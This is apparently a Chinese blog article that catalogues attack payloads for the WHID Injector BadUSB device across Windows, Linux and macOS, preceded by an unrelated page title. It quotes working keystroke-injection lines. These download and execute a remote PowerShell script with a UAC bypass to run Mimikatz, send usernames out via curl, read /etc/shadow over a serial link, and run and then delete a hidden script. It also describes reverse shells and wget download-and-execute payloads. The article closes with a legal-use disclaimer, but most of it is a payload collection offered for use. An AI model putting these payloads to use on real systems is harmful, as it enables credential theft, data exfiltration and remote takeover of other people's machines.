企业官网建设流程全解析

WHID Injector payload库精选：Windows、Linux、macOS三平台攻击脚本大全

【免费下载链接】WHIDWiFi HID Injector - An USB Rubberducky / BadUSB On Steroids.项目地址: https://gitcode.com/gh_mirrors/wh/WHID

WHID Injector是一款功能强大的WiFi HID注入工具，常被称为"增强版USB Rubberducky"或"BadUSB"。它能够模拟键盘输入，执行预定义的攻击脚本（payload），在Windows、Linux和macOS三大主流操作系统上实现各种渗透测试功能。本文将为你精选WHID项目中最实用的跨平台攻击脚本，帮助安全爱好者快速掌握这款强大工具的使用方法。

认识WHID Injector：从硬件到GUI界面

在深入了解payload之前，让我们先认识一下WHID Injector的基本组成和操作界面。WHID设备通常需要进行硬件组装，下图展示了一个已安装完成的WHID设备内部结构，包含了核心的电路板和连接组件：

WHID Injector提供了直观的Web管理界面，通过WiFi连接后，用户可以轻松上传、选择和管理各种payload脚本。下面的截图展示了WHID的Web管理界面，包括主页面、payload列表和payload详情三个核心视图：

Windows平台精选payload：从凭证获取到远程控制

Windows系统作为最广泛使用的桌面操作系统，自然成为了渗透测试的主要目标。WHID项目提供了多个针对Windows的实用payload，涵盖凭证窃取、远程控制等关键功能。

Mimikatz凭证提取：Win32/Ribbons.scr绕过技术

[Payload路径：Payloads/windows/MimikatzScr.txt]

这个payload利用Windows系统的屏幕保护程序漏洞，通过执行Ribbons.scr来绕过某些安全限制，然后下载并执行经过混淆处理的PowerShell脚本，最终实现Mimikatz的功能，提取系统中的凭证信息。核心代码片段如下：

PrintLine:start C:/Windows/System32/Ribbons.scr /s Delay PrintLine:powershell -nop -noni -w 1 -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadString('https://goo.gl/KSZT1U');Bypass-UAC -Method ucmDismMethod;"

用户名串行渗透：PowerShell串口通信技术

[Payload路径：ESPloitV2_whid/payloads/WinSerialEXFIL.txt]

这个payload通过PowerShell脚本识别连接的WHID设备，然后通过串口通信将当前登录用户名发送出去。对于物理接触场景下的信息收集非常有用：

PrintLine:$s=(Get-WmiObject -Class Win32_PnPEntity -Namespace "root\CIMV2" -Filter "PNPDeviceID like 'USB\\VID_1b4f&PID_9208%'").Caption; $com=[regex]::match($s,'\(([^\)]+)\)').Groups[1].Value; $cmd=whoami; $port= new-Object System.IO.Ports.SerialPort $com,38400,None,8,one; $port.open(); $port.WriteLine("SerialEXFIL:$cmd"); $port.Close(); exit;

Linux平台精选payload：系统信息窃取与数据渗透

Linux系统以其安全性著称，但依然存在被物理攻击的风险。WHID项目提供了多个针对Linux的payload，帮助安全测试人员评估系统在物理接触场景下的安全性。

用户名HTTP渗透：本地网络数据外发

[Payload路径：ESPloitV2_whid/payloads/LinHTTPExfiltrate.txt]

这个payload适用于WHID设备与目标Linux机器处于同一网络的场景。它通过gnome-terminal打开终端，执行whoami命令获取当前用户名，然后通过curl命令将数据发送到指定的HTTP服务器：

Press:134+195 PrintLine:gnome-terminal PrintLine:data="$(whoami)"; export xip='192.168.1.1'; export xfile='LinuxUser.txt'; curl "http://${xip}/exfiltrate?file=${xfile}&data=${data}"; exit

系统信息串行渗透：Shadow文件提取技术

[Payload路径：ESPloitV2_whid/payloads/LinSerialEXFIL.txt]

这个payload展示了如何通过串口连接提取Linux系统的敏感信息。除了基本的用户名提取外，还提供了提取/etc/shadow文件的示例，这对于密码破解非常有价值：

PrintLine:sleep .5;stty -F /dev/serial/by-id/*LilyPad* 38400;echo -e "SerialEXFIL:"$(whoami)"\nBlinkLED:3" > /dev/serial/by-id/*LilyPad*;exit

进阶用法示例（提取shadow文件）：

PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;sleep .5;echo -e "SerialEXFIL:"$(cat /etc/shadow)"\nBlinkLED:3" > /dev/serial/by-id/*LilyPad*

macOS平台精选payload：bash反向shell与命令渗透

macOS作为苹果的桌面操作系统，虽然市场份额相对较小，但在特定场景下也是渗透测试的目标。WHID项目提供了多个针对macOS的payload，主要集中在bash反向shell和命令执行方面。

bash反向shell：远程控制macOS系统

[Payload路径：Payloads/mac-osx/bash-reverseshell/payload.txt] [Payload路径：Payloads/mac-osx/bash-reverseshell-alt/payload.txt]

这两个payload提供了不同方式的bash反向shell实现，通过建立与攻击者控制的服务器的连接，实现对macOS系统的远程控制。这类payload在物理接触攻击中非常有效，能够快速获取目标系统的控制权。

wget命令渗透：从远程服务器下载并执行文件

[Payload路径：Payloads/mac-osx/wget-cmd-exfil/payload.txt]

这个payload利用wget命令从远程服务器下载文件并执行，展示了如何在macOS系统上通过简单的命令实现数据渗透和代码执行。对于快速部署自定义攻击脚本非常有用。

跨平台通用payload：基础功能与测试工具

除了针对特定操作系统的payload外，WHID项目还提供了一些跨平台通用的payload，用于基础功能测试和环境评估。

键盘测试工具：鼠标点击与键盘输入测试

[Payload路径：ESPloitV2_whid/payloads/mousetest.txt]

这个payload用于测试WHID设备的鼠标和键盘模拟功能，通过执行一系列预设的鼠标移动、点击和键盘输入操作，验证设备是否正常工作。

隐藏payload技术：Kali Linux隐蔽执行

[Payload路径：ESPloitV2_whid/payloads/kali2hiddenpayld.txt]

这个payload展示了如何在Kali Linux系统上创建并执行隐藏的攻击脚本，包括使用nano编辑器创建文件、设置执行权限、运行脚本以及清理痕迹等完整流程：

PrintLine:gnome-terminal PrintLine:nano PrintLine:echo Payload Here. PrintLine:echo Test Successful! Press:128+120 Print:y PrintLine:payload.sh PrintLine:chmod 777 ./payload.sh PrintLine:./payload.sh PrintLine:rm payload.sh PrintLine:exit

如何开始使用WHID payload库

要开始使用WHID Injector的payload库，首先需要克隆项目仓库：

git clone https://gitcode.com/gh_mirrors/wh/WHID

项目中的payload主要集中在以下两个目录：

• ESPloitV2_whid/payloads/：包含各种基础和通用payload
• Payloads/：按操作系统分类的专用payload，包括windows、linux和mac-osx子目录

选择合适的payload后，可以通过WHID的Web界面上传并执行，也可以通过串口或其他方式将payload传输到设备中。

总结：WHID Injector payload的强大与风险

WHID Injector的payload库为安全测试人员提供了丰富的攻击向量和技术实现，涵盖了从简单信息收集到复杂远程控制的各种功能。通过本文介绍的精选payload，你可以快速掌握不同操作系统下的攻击方法和技术细节。

然而，需要强调的是，这些工具和技术仅应用于合法的安全测试和授权的渗透评估。未经授权的使用可能会违反法律法规，并对他人的隐私和财产安全造成严重威胁。安全技术的核心价值在于保护，而非破坏。

希望本文能够帮助你更好地理解和使用WHID Injector，在合法合规的前提下提升你的安全测试能力。记住，真正的安全专家不仅要掌握攻击技术，更要懂得如何防御这些攻击，保护系统和数据的安全。

【免费下载链接】WHIDWiFi HID Injector - An USB Rubberducky / BadUSB On Steroids.项目地址: https://gitcode.com/gh_mirrors/wh/WHID